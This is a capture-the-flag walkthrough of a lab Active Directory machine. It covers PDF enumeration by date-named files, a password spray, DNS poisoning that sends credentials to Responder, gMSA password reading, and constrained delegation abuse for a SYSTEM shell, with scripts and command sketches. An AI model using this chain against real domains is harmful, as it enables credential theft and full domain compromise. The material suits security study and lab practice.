Intelligence is a Windows machine running an Active Directory environment. Browsing the hosted website reveals a naming convention for uploaded PDFs; brute-forcing that convention uncovers a collection of documents, one of which contains the default password for new user accounts. Metadata extracted from the documents yields a username list for a password spray, which produces a valid user account. This user has read access to an SMB share containing a PowerShell script that runs on a schedule to check web servers for outages. Adding a custom DNS record causes the script to authenticate to an attacker-controlled Responder HTTP server, which captures the NTLMv2 hash of another user. After cracking that hash, further enumeration shows that the user belongs to a group that can read the gMSA password of a service account with constrained delegation to the DC. Using the NTLM hash of the service account, a service ticket can be requested as the administrator and then used to obtain a SYSTEM shell.



nmap scan:

Notable open ports:

- 53 (DNS)

- 80 (HTTP)

- 88 (Kerberos)

- 135, 593 (MSRPC)

- 139, 445 (SMB)

- 464 (kpasswd)

- 389, 3268 (LDAP)

- 636, 3269 (LDAPS)

Active Directory:

- domain: intelligence.htb

- hostname: DC



Access denied when I tried listing shares with anonymous logon:

Webpage on port 80:

There was a section on the page that contained links to documents:





The links led to PDF documents containing only placeholder text. More usefully, the files were named after their upload date:

Announcement Document:

Other Document:



To check for other documents stored on the server, I used the following bash script. It generates file names following the YYYY-mm-dd-upload.pdf convention, producing a wordlist that covers every day from January 1st, 2020 through July 3rd, 2021 (the date this machine was released):

generate-upload-wordlist.sh:

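    #!/bin/bash

    # Print one candidate file name per day, starting at January 1st of the
    # given year and continuing for the given number of additional days.
    generate_dates() {
        local year=$1
        local days=$2
        for i in $(seq 0 "$days"); do
            date -d "${year}-01-01 + ${i} days" "+%Y-%m-%d-upload.pdf"
        done
    }

    {
        generate_dates 2020 365   # 2020 is a leap year: offsets 0-365 cover all 366 days
        generate_dates 2021 183   # offset 183 is July 3rd, 2021
    } > upload-dates

After running the script, a wordlist was generated called upload-dates: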
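The day counts passed to generate_dates (365 and 183) have to be worked out by hand, and the leap year makes that easy to get wrong. As a minimal sketch of an alternative, assuming GNU date is available, the same list can be produced from explicit start and end dates. The function name generate_range is hypothetical and not part of the original script.

```bash
#!/bin/bash

# Hypothetical helper: print one candidate file name per day from
# start to end (both inclusive, both in YYYY-mm-dd form).
generate_range() {
    local start="$1" end="$2" start_s end_s days i
    # Work in UTC so daylight saving changes cannot shift the day count.
    start_s=$(date -u -d "$start" +%s)
    end_s=$(date -u -d "$end" +%s)
    days=$(( (end_s - start_s) / 86400 ))
    i=0
    while [ "$i" -le "$days" ]; do
        date -u -d "$start + $i days" "+%Y-%m-%d-upload.pdf"
        i=$((i + 1))
    done
}

# Example:
# generate_range 2020-01-01 2021-07-03 > upload-dates
```

Passing the dates directly keeps the range readable and removes the need to count days per year.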

upload-dates:

2020-01-01-upload.pdf

2020-01-02-upload.pdf

2020-01-03-upload.pdf

2020-01-04-upload.pdf

2020-01-05-upload.pdf

2020-01-06-upload.pdf

2020-01-07-upload.pdf

2020-01-08-upload.pdf

2020-01-09-upload.pdf

2020-01-10-upload.pdf

<...snip...>



2021-07-03-upload.pdfUsing the upload-dates wordlist, I fuzzed the /documents directory with ffuf and wrote the results into ffuf-output:
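The exact ffuf command is not reproduced in the text, so the following is only a sketch of an invocation that would produce output in this shape, not necessarily the one that was used. The function name fuzz_documents is hypothetical; -w, -u and -mc are standard ffuf options, and FUZZ is the keyword ffuf replaces with each wordlist entry.

```bash
#!/bin/bash

# Hypothetical wrapper: request every file name in the wordlist under
# base_url and report only the ones that return HTTP 200.
fuzz_documents() {
    local wordlist="$1" base_url="$2"
    ffuf -w "$wordlist" -u "${base_url}/FUZZ" -mc 200
}

# Example (target URL assumed from the rest of this writeup):
# fuzz_documents upload-dates http://intelligence.htb/documents | tee ffuf-output
```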

ffuf-output:

2020-01-23-upload.pdf [Status: 200, Size: 11557, Words: 167, Lines: 136, Duration: 254ms]

2020-01-20-upload.pdf [Status: 200, Size: 11632, Words: 157, Lines: 127, Duration: 263ms]

2020-02-17-upload.pdf [Status: 200, Size: 11228, Words: 167, Lines: 132, Duration: 2181ms]

2020-01-22-upload.pdf [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 260ms]

2020-02-23-upload.pdf [Status: 200, Size: 27378, Words: 247, Lines: 213, Duration: 2685ms]

2020-02-24-upload.pdf [Status: 200, Size: 27332, Words: 237, Lines: 206, Duration: 2714ms]

2020-01-25-upload.pdf [Status: 200, Size: 26252, Words: 225, Lines: 193, Duration: 301ms]

2020-02-28-upload.pdf [Status: 200, Size: 11543, Words: 167, Lines: 131, Duration: 2853ms]

2020-01-10-upload.pdf [Status: 200, Size: 26400, Words: 232, Lines: 205, Duration: 666ms]

<...snip...>



2021-03-21-upload.pdf [Status: 200, Size: 26810, Words: 229, Lines: 205, Duration: 401ms]I made a wordlist named uploads-status-200 by extracting the file names from ffuf-output:
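The file names can be pulled out of ffuf-output in several ways. As one sketch, assuming the result lines have the shape shown in ffuf-output, a pattern match on the naming convention is enough. The function name extract_hits is hypothetical.

```bash
#!/bin/bash

# Hypothetical helper: print only the file names found in ffuf result lines.
# grep -o matches on the naming convention rather than splitting on
# whitespace, so anything else on the line (status, size, duration) is ignored.
extract_hits() {
    grep -oE '[0-9]{4}-[0-9]{2}-[0-9]{2}-upload\.pdf' "$1"
}

# Example:
# extract_hits ffuf-output > uploads-status-200
```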

uploads-status-200 (99 items):

2020-01-23-upload.pdf

2020-01-20-upload.pdf

2020-02-17-upload.pdf

2020-01-22-upload.pdf

2020-02-23-upload.pdf

2020-02-24-upload.pdf

2020-01-25-upload.pdf

2020-02-28-upload.pdf

2020-01-10-upload.pdf

2020-01-04-upload.pdf

<...snip...>



2021-03-21-upload.pdfI ran the following script to download all of the documents from the uploads-status-200 wordlist.

download-documents.sh:

#!/bin/bash

wordlist="uploads-status-200"

base_url="http://intelligence.htb/documents/"

output_folder="pdf-documents"

while IFS= read -r filename; do

url="${base_url}${filename}"

curl -o "$output_folder/$filename" -J -L "$url"



done < "$wordlist"Using pdftk, I combined the PDFs into a single document to quickly sift through them:

After looking at the documents, the only ones that didn't have placeholder text were the following.



2020-06-04-upload.pdf contained a default new account password, NewIntelligenceCorpUser9876:



2020-12-30-upload.pdf:







Inspecting the metadata on a few of the PDFs with exiftool showed creator names:



So I used the following bash script to make a username list by extracting the creator names from all of the documents.

extract-creator-names.sh:

output_file="creator-names.txt"

for file in pdf-documents/*.pdf; do

creator=$(exiftool -Creator "$file" | awk '{print $3}')

echo "$creator" >> "$output_file"

done





sort -u -o "$output_file" "$output_file"A password spray with the default password against the generated username list (creator-names.txt) resulted in a valid account, Tiffany.Molina:



These credentials provided access to some shares:



Of the SMB shares, the most interesting was the IT share, which contained a PowerShell script:

downdetector.ps1:



The script appeared to be the one mentioned in the Internal IT Update document. It sends a web request to each DNS record in the domain whose name starts with "web" and checks whether the server responds with a 200 status code. Because the request is authenticated, the credentials can be intercepted by adding a custom DNS record whose name starts with "web" and points to my machine, then capturing the authentication attempt with Responder.

I added a custom DNS record using dnstool.py from krbrelayx:


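The dnstool.py command itself is not reproduced in the text. As a rough sketch, assuming the Tiffany.Molina credentials were used and that dnstool.py sits in the current directory, adding an A record could look like the following. The function name add_web_record, the record name, and the IP placeholders are all hypothetical; the only requirement taken from the script is that the record name starts with "web".

```bash
#!/bin/bash

# Hypothetical wrapper around krbrelayx's dnstool.py.
# Arguments: domain\user, password, record name, IP the record points to, DC address.
add_web_record() {
    local user="$1" password="$2" record="$3" attacker_ip="$4" dc="$5"
    python3 dnstool.py -u "$user" -p "$password" \
        -a add -r "$record" -d "$attacker_ip" "$dc"
}

# Example with placeholder values (record name and IPs are assumptions):
# add_web_record 'intelligence.htb\Tiffany.Molina' 'NewIntelligenceCorpUser9876' \
#     'web-test.intelligence.htb' '<attacker tun0 IP>' '<DC IP>'
```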

I started Responder with sudo responder -I tun0 -v, and after about five minutes the NTLMv2 hash for Ted.Graves was captured:



John the Ripper (JtR) cracked the password:



Using the credentials for ted.graves, I ran bloodhound-python to collect domain info for BloodHound:





Within BloodHound, First Degree Group Membership for ted.graves showed membership in the itsupport group:

First Degree Object Control for itsupport showed that the group had ReadGMSAPassword on svc_int:



Group Managed Service Accounts (gMSAs) have their passwords generated and rotated automatically by Active Directory, and any principal permitted to retrieve the password can read it from the account. In this case, members of the itsupport group could read the gMSA password for svc_int, so I was able to get its NTLM hash with gMSADumper:



impacket-findDelegation showed that svc_int had constrained delegation privileges on the DC:



Therefore, I could use impacket-getST to request a service ticket impersonating the administrator user. However, there was a clock skew error when I initially tried to request the ticket:



Syncing my local system clock with the DC using ntpdate solved the issue:



When I requested the ticket again, it was successful:



I used administrator.ccache to obtain a system shell with psexec.py:
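The commands for these last two steps are not reproduced in the text. A sketch of how they could be chained is shown below, assuming the Kali-style impacket-getST wrapper, a psexec.py on the PATH, and dc.intelligence.htb resolving to the DC (for example through /etc/hosts). The function name shell_as_admin is hypothetical, and the SPN is left as a parameter because it has to come from the impacket-findDelegation output.

```bash
#!/bin/bash

# Hypothetical wrapper: request a service ticket for the delegated SPN as
# Administrator using the gMSA account's NTLM hash, then reuse that ticket
# with psexec.py.
# Arguments: SPN listed by impacket-findDelegation, NT hash of svc_int, DC IP.
shell_as_admin() {
    local spn="$1" nt_hash="$2" dc_ip="$3"
    impacket-getST -spn "$spn" -impersonate Administrator \
        -hashes ":${nt_hash}" -dc-ip "$dc_ip" 'intelligence.htb/svc_int$' || return 1
    # The ccache name follows the writeup; newer Impacket releases may name
    # the saved file differently.
    KRB5CCNAME=administrator.ccache psexec.py -k -no-pass \
        'intelligence.htb/administrator@dc.intelligence.htb'
}

# Example with placeholder values:
# shell_as_admin '<SPN from findDelegation>' '<svc_int NT hash>' '<DC IP>'
```

Kerberos authentication depends on the host name, so the target is given as dc.intelligence.htb rather than as an IP address.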